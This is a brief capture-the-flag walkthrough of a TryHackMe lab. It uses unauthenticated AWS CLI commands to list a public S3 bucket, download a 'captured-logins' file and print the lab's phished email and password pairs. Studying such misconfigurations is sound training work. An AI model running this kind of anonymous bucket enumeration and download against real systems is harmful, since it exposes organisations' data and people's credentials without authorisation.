A Bucket of Phish
Summary
A bucket of phish is a easy room on TryHackMe, where the goal is to find a flag hidden in a public S3 bucket.
Theory Used
Walkthrough
Looking at the website, we can sett that it is running using the aws service, so we can try to list some public informations on the website, like public buckets
1
2
3
4
aws s3 ls s3://darkinjector-phish --no-sign-request
2025-03-17 06:46:17 132 captured-logins-093582390
2025-03-17 06:25:33 2300 index.html
We can see two files, the index page of the website and a captured-logins file, where is possible to find the credentials captured along with the flag for this challenge
1
2
3
4
5
6
7
8
9
aws s3 cp s3://darkinjector-phish/captured-logins-093582390 ./ --no-sign-request
download: s3://darkinjector-phish/captured-logins-093582390 to ./captured-logins-093582390
cat captured-logins-093582390
user,pass
munra@thm.thm,Password123
test@thm.thm,123456
mario@thm.thm,Mario123
flag@thm.thm,<REDACTED>
This post is licensed under CC BY 4.0 by the author.